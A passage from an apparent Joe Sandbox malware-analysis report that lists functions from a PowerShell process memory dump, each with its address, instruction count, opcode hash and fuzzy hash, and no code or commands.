                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D207E, Relevance: .1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2b479910fc608f6081299f6ada824692f4784fac8133ea029532b31d1158c1ee
                                                                                              • Instruction ID: bcdc460411db29c0b530457ff661d38ae125af8c80625ab3005dceedcfb00225
                                                                                              • Opcode Fuzzy Hash: 2b479910fc608f6081299f6ada824692f4784fac8133ea029532b31d1158c1ee
                                                                                              • Instruction Fuzzy Hash: E6211834200B048FC754EF75C494AAAB7E2FF84309F5689BDD19A8B264DF76A841CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2090, Relevance: .1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: df62b7f2926ada8a3d3f63031379987302be4a692cbf0260870a7367e99a6321
                                                                                              • Instruction ID: ca4aedfe657cb66b415aa7edccc9096bf6a504da900da33735d013b02685fcde
                                                                                              • Opcode Fuzzy Hash: df62b7f2926ada8a3d3f63031379987302be4a692cbf0260870a7367e99a6321
                                                                                              • Instruction Fuzzy Hash: 3D21C734200A048BC754EB76C494AAAB7E6FF85305F5189BCD19A8B264DF72AC41CBD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D3F1C, Relevance: .1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1ccde5c6631c369dd2b05d3c2b27b6c5f59cc38a5e70cfaf2bd5e4e98a674e01
                                                                                              • Instruction ID: d39f4042aeffa318ac3ed461a69fdf8eb242f370478209bc2b529b9e74c4ea9a
                                                                                              • Opcode Fuzzy Hash: 1ccde5c6631c369dd2b05d3c2b27b6c5f59cc38a5e70cfaf2bd5e4e98a674e01
                                                                                              • Instruction Fuzzy Hash: 4F2103B5D052589FCB50CF99D884BDEFBF4FB89314F14816AE808BB241D774A944CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D5FB1, Relevance: .1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1caaef02d13e6a07c327e4a44ad0d371cd6abe65a456f7be2ceb4f7530175d80
                                                                                              • Instruction ID: f039f472f0c240e2f13c2bf931668370075fcdf1f1b0616bb70c3604c52f0752
                                                                                              • Opcode Fuzzy Hash: 1caaef02d13e6a07c327e4a44ad0d371cd6abe65a456f7be2ceb4f7530175d80
                                                                                              • Instruction Fuzzy Hash: 6A2106B5D052589FCB10CFA9E885BDEFBF4FB48314F14816AD808BB241D774A944CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D4278, Relevance: .1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c10aacffdb56f5e48a696105601e7767b490e17ba487be5b1207b8a89c3bc338
                                                                                              • Instruction ID: 5184c57db6974f1059f1ff39864e14ca0901f6f918f3a634dffdda6e777bd2c5
                                                                                              • Opcode Fuzzy Hash: c10aacffdb56f5e48a696105601e7767b490e17ba487be5b1207b8a89c3bc338
                                                                                              • Instruction Fuzzy Hash: D201B521B182515BFF24DA7BC8083BE6AF95B49314F4C04B99946E7EC1EEB9E8C08351
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037DFBE9, Relevance: .1, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dff43cdfce788a1bc14153becf7ee00253e5c6e9875b6750bcaf59aecd2809da
                                                                                              • Instruction ID: 8c1f6bc46692c464e59191b04049c9e652845946d03c552b3287d8841c43967a
                                                                                              • Opcode Fuzzy Hash: dff43cdfce788a1bc14153becf7ee00253e5c6e9875b6750bcaf59aecd2809da
                                                                                              • Instruction Fuzzy Hash: AA11227291C3908BD716CB28D9553A9BFE49F46215F0C84EAD889CB182D6388924DBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D47D0, Relevance: .0, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 225a966742d31a97bb540f161f02bc57060a0c4dae3bde761e6cbbbbc68d439c
                                                                                              • Instruction ID: 142e0c10083d6e343d335aad28913b42933b006351712210a403de8d6197aad5
                                                                                              • Opcode Fuzzy Hash: 225a966742d31a97bb540f161f02bc57060a0c4dae3bde761e6cbbbbc68d439c
                                                                                              • Instruction Fuzzy Hash: 4711E174D006888BDB14DF61C859BEEBBF1BF44345F0448A8C401BA190DF795A80DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D3A20, Relevance: .0, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d49f9eae5353ad58d053b686f4310fabf416d9d311d0b2411fe2fc8204788fca
                                                                                              • Instruction ID: f981aa9f75dc9122e51a55591b39235130b52b27530414cd85af38ed05d0e6b6
                                                                                              • Opcode Fuzzy Hash: d49f9eae5353ad58d053b686f4310fabf416d9d311d0b2411fe2fc8204788fca
                                                                                              • Instruction Fuzzy Hash: 87F06D3A3146114FC784EBBCD494A6E3BE2DF89725B0245ADD116CB3E0DE25DC418BD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D5F19, Relevance: .0, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edeec8f624ee5f5482f7e1cd4a8f96f2fc7cc6ab1a8e343f483d9700f3ff3e69
                                                                                              • Instruction ID: c437072e063e76ff05b2904b5ed008aa673f6da43aeb56a748ea84aedf316890
                                                                                              • Opcode Fuzzy Hash: edeec8f624ee5f5482f7e1cd4a8f96f2fc7cc6ab1a8e343f483d9700f3ff3e69
                                                                                              • Instruction Fuzzy Hash: F1F02EAB70C350AFC32145AD5E54676AFBD9F872A1B0D00E7F584CF292D51D88048371
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D3A30, Relevance: .0, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 778ad194ebe3245bf27ae9e52527fcac09095a845a24c6989eb5df3e7c607604
                                                                                              • Instruction ID: 1fdfaa4dd23127fcaecec4d4ecf97324a8fb8eb4187932f23e166e9ac6e4b889
                                                                                              • Opcode Fuzzy Hash: 778ad194ebe3245bf27ae9e52527fcac09095a845a24c6989eb5df3e7c607604
                                                                                              • Instruction Fuzzy Hash: A8F0F8393106154FCA88EBBDC454A2E77E6EFC971574144BDE216CB3A0DE25DC018BE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2178, Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f5847a2e8997f5d9942fd4e25fdd47a9cc65d7cce05353bf5c903dd08a54d592
                                                                                              • Instruction ID: f0899136a2b33ac3bc7faf4a363b6afb90fe419ebf55fe05de2b1c34a44f44fa
                                                                                              • Opcode Fuzzy Hash: f5847a2e8997f5d9942fd4e25fdd47a9cc65d7cce05353bf5c903dd08a54d592
                                                                                              • Instruction Fuzzy Hash: 26F05E70C082998BCF15CFB9C4142DDBFB1BF49219F1882AEC564A7691E73A4043CB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D21F0, Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86a043050c9da497bd4225a867e6e74b31b5e23fda67a4a36045ed08d1f1c521
                                                                                              • Instruction ID: 27ca85047a6530ba0370557678d26c87763aa8dea6d170e4f95168574e2efc30
                                                                                              • Opcode Fuzzy Hash: 86a043050c9da497bd4225a867e6e74b31b5e23fda67a4a36045ed08d1f1c521
                                                                                              • Instruction Fuzzy Hash: 60E06D359142905FDB021770EC2D7B67FB6EF89215F084492E58582256EA29496AC780
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2188, Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3b22440a00cc40d607b2a354f450d9f57232f7aead08b4d1855888802ac46585
                                                                                              • Instruction ID: a536fb163ea3f9e5067f2e17bf4ee20bb8e8afb9416f817fc058c31fe29f37a2
                                                                                              • Opcode Fuzzy Hash: 3b22440a00cc40d607b2a354f450d9f57232f7aead08b4d1855888802ac46585
                                                                                              • Instruction Fuzzy Hash: B9F09270D0421D8FCF58DFA989452EDFBF1BB48205F14866AC518B2250E7394542CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2D60, Relevance: .0, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a5131be77e21d900f0d7396ce06ff3cb06da56aa15b3271a0e5ba59c825bc124
                                                                                              • Instruction ID: 16a9292734276b2852b565a02d6c1d7761b4791b66ee307e9d02256e6d0a785b
                                                                                              • Opcode Fuzzy Hash: a5131be77e21d900f0d7396ce06ff3cb06da56aa15b3271a0e5ba59c825bc124
                                                                                              • Instruction Fuzzy Hash: A3E026766101108FC740C7A4E958BD23B91EF0C312F0145ABEA08C73B0CA29CC048BC1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2200, Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aabdbdd64773d855a8d9507c6644babe0d8d9d06a8c93bdb0aeb82e88110a9f9
                                                                                              • Instruction ID: 285359ce0d279cd9dcf58ccce9173e60e9f2667e192b4fada07f7b696d6a0103
                                                                                              • Opcode Fuzzy Hash: aabdbdd64773d855a8d9507c6644babe0d8d9d06a8c93bdb0aeb82e88110a9f9
                                                                                              • Instruction Fuzzy Hash: 38E0EC342207048FEB06ABA5F82D93A7B9BEB88315F148475A60987295DE365D568B80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2D70, Relevance: .0, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 16e6d3204242770c2f45add19a2932d048e002cf302790e4ee537bbbf116dc9f
                                                                                              • Instruction ID: 45b9aefe4393b5ff87f40e667dc571508b838357911c6d249eddfbe190fc52c6
                                                                                              • Opcode Fuzzy Hash: 16e6d3204242770c2f45add19a2932d048e002cf302790e4ee537bbbf116dc9f
                                                                                              • Instruction Fuzzy Hash: 32D05E392106109FC700EB68E85CE967BA9EF4D725F0140A6EA0D87371CA71DC048BD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D27C1, Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c7fb8a5e0d0ae6ae83e1aa5c5c5c0a2c97da1610bf802fb95bd28fbb4ea9b763
                                                                                              • Instruction ID: bc9986b06cb6fbf916891005503aeeda237fa3c37ea9be3303f847537bfe96fa
                                                                                              • Opcode Fuzzy Hash: c7fb8a5e0d0ae6ae83e1aa5c5c5c0a2c97da1610bf802fb95bd28fbb4ea9b763
                                                                                              • Instruction Fuzzy Hash: F1D05EA6C286408BD70626F4F60A31A3A50DF80202F0F44B6A009C6AD1C95A80448A21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D27D0, Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ced5b441ec80bbe65d449f876dbc6863fc99386012e682fa56f932ea700b7914
                                                                                              • Instruction ID: b0fc3e9cfdbc715acab98acb0da517c2ee9c5170c130e03605e809d4cc480a44
                                                                                              • Opcode Fuzzy Hash: ced5b441ec80bbe65d449f876dbc6863fc99386012e682fa56f932ea700b7914
                                                                                              • Instruction Fuzzy Hash: E6D012345657049FD70577B4F40E26E3F98DF80712F0A40B6B10EC69D2CE6994858F21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2EF0, Relevance: .0, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edcc20d7b25e4b11918b9fbf44b5df71b3dc42d7681a45da430f4dab9dcf289f
                                                                                              • Instruction ID: 46f4309a29f11836ea7703804a3be1d77e5d32080feb4dddb937c1b43f25193b
                                                                                              • Opcode Fuzzy Hash: edcc20d7b25e4b11918b9fbf44b5df71b3dc42d7681a45da430f4dab9dcf289f
                                                                                              • Instruction Fuzzy Hash: E7C09BF3D741808FF702D570D809F623D78DF61305F0744716255E50C5EA56D0518565
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions